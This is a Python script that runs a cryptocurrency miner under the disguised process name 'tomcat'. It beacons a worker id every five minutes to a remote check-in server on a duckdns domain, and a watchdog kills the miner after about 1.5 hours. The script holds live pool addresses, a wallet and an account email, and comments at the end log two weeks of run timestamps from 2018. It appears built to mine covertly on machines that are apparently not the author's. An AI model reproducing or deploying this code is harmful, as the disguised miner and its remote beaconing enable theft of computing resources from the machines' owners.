import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:07:05.148601
#2018-02-17 16:55:07.079568
#2018-02-17 18:44:03.390794
#2018-02-17 20:33:01.351664
#2018-02-17 22:19:04.110210
#2018-02-18 00:03:04.527409
#2018-02-18 01:54:05.474344
#2018-02-18 03:42:03.314145
#2018-02-18 05:29:05.363709
#2018-02-18 07:21:01.916125
#2018-02-18 09:09:07.592273
#2018-02-18 10:55:05.640568
#2018-02-18 12:41:03.498499
#2018-02-18 14:28:05.234852
#2018-02-18 16:18:06.436424
#2018-02-18 18:07:07.219272
#2018-02-18 19:53:06.064892
#2018-02-18 21:40:01.444415
#2018-02-18 23:28:01.842467
#2018-02-19 01:15:08.810588
#2018-02-19 03:03:01.955449
#2018-02-19 04:50:07.110845
#2018-02-19 06:35:01.580250
#2018-02-19 08:23:07.322155
#2018-02-19 10:13:06.789883
#2018-02-19 12:01:06.564491
#2018-02-19 13:47:05.921582
#2018-02-19 15:35:04.376012
#2018-02-19 17:23:06.272317
#2018-02-19 19:11:06.021771
#2018-02-19 20:58:04.021862
#2018-02-19 22:46:07.718018
#2018-02-20 00:28:04.437638
#2018-02-20 02:15:06.992714
#2018-02-20 04:06:06.368788
#2018-02-20 05:49:04.411602
#2018-02-20 07:35:01.623046
#2018-02-20 09:20:07.866630
#2018-02-20 11:05:10.762908
#2018-02-20 12:52:06.947585
#2018-02-20 14:38:08.205282
#2018-02-20 16:22:01.347263
#2018-02-20 18:09:01.332141
#2018-02-20 20:02:06.446850
#2018-02-20 21:50:08.172721
#2018-02-20 23:30:07.524972
#2018-02-21 01:15:01.651232
#2018-02-21 03:02:06.213264
#2018-02-21 04:48:08.357346
#2018-02-21 06:32:06.316965
#2018-02-21 08:19:04.667362
#2018-02-21 10:05:07.506347
#2018-02-21 11:52:06.164900
#2018-02-21 13:43:06.154537
#2018-02-21 15:27:04.930969
#2018-02-21 17:17:09.202657
#2018-02-21 19:05:05.633220
#2018-02-21 20:53:04.418020
#2018-02-21 22:39:07.577166
#2018-02-22 00:28:01.508048
#2018-02-22 02:18:04.204668
#2018-02-22 04:04:07.257238
#2018-02-22 05:50:04.438075
#2018-02-22 07:35:06.010749
#2018-02-22 09:23:06.718547
#2018-02-22 11:09:07.322468
#2018-02-22 12:56:07.098285
#2018-02-22 14:44:09.910788
#2018-02-22 16:29:05.967942
#2018-02-22 18:16:07.608224
#2018-02-22 20:06:09.936363
#2018-02-22 21:55:06.958632
#2018-02-22 23:44:03.785024
#2018-02-23 01:32:02.242383
#2018-02-23 03:17:03.974529
#2018-02-23 05:03:06.774851
#2018-02-23 06:49:07.088463
#2018-02-23 08:40:10.556412
#2018-02-23 10:57:07.294738
#2018-02-23 12:54:06.179539
#2018-02-23 14:38:01.811288
#2018-02-23 16:28:02.111967
#2018-02-23 18:14:01.456536
#2018-02-23 19:58:08.186992
#2018-02-23 21:43:01.743761
#2018-02-23 23:35:08.148197
#2018-02-24 01:24:05.340755
#2018-02-24 03:15:10.521489
#2018-02-24 05:02:02.034492
#2018-02-24 06:53:02.112256
#2018-02-24 08:43:06.719223
#2018-02-24 10:28:04.870056
#2018-02-24 12:22:04.974351
#2018-02-24 14:13:07.176877
#2018-02-24 16:00:04.429076
#2018-02-24 17:53:01.579280
#2018-02-24 19:40:01.731254
#2018-02-24 21:27:04.346476
#2018-02-25 02:01:04.682405
#2018-02-25 05:56:03.829816
#2018-02-25 11:38:05.575320